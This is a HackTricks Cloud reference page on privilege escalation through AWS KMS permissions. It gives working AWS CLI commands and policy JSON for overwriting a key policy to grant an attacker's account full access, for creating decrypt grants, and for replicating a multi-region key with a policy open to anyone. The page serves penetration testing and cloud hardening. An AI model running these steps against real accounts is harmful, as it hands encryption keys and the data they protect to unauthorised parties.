🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS - KMS Privesc

AWS - KMS Privesc

{{#include ../../../../banners/hacktricks-training.md}}

KMS

For more info about KMS check:

{{#ref}}
../../aws-services/aws-kms-enum.md
{{#endref}}

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

With these permissions it's possible to modify the access permissions to the key so it can be used by other accounts or even anyone:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<origin_account>:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow all use",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<attackers_account>:root"
      },
      "Action": ["kms:*"],
      "Resource": "*"
    }
  ]
}

kms:CreateGrant

It allows a principal to use a KMS key:

aws kms create-grant \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
    --operations Decrypt
⚠️ Warning
A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
⚠️ Warning
Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). 
# Use the grant token in a request
aws kms generate-data-key \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    –-key-spec AES_256 \
    --grant-tokens $token

Note that it's possible to list grant of keys with:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.

So, an attacker could abuse this to obtain privesc his access to the key and use it

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "kms:*",
            "Resource": "*"
        }
    ]
}

kms:Decrypt

This permission allows to use a key to decrypt some information.\
For more information check:

{{#ref}}
../../aws-post-exploitation/aws-kms-post-exploitation/README.md
{{#endref}}

{{#include ../../../../banners/hacktricks-training.md}}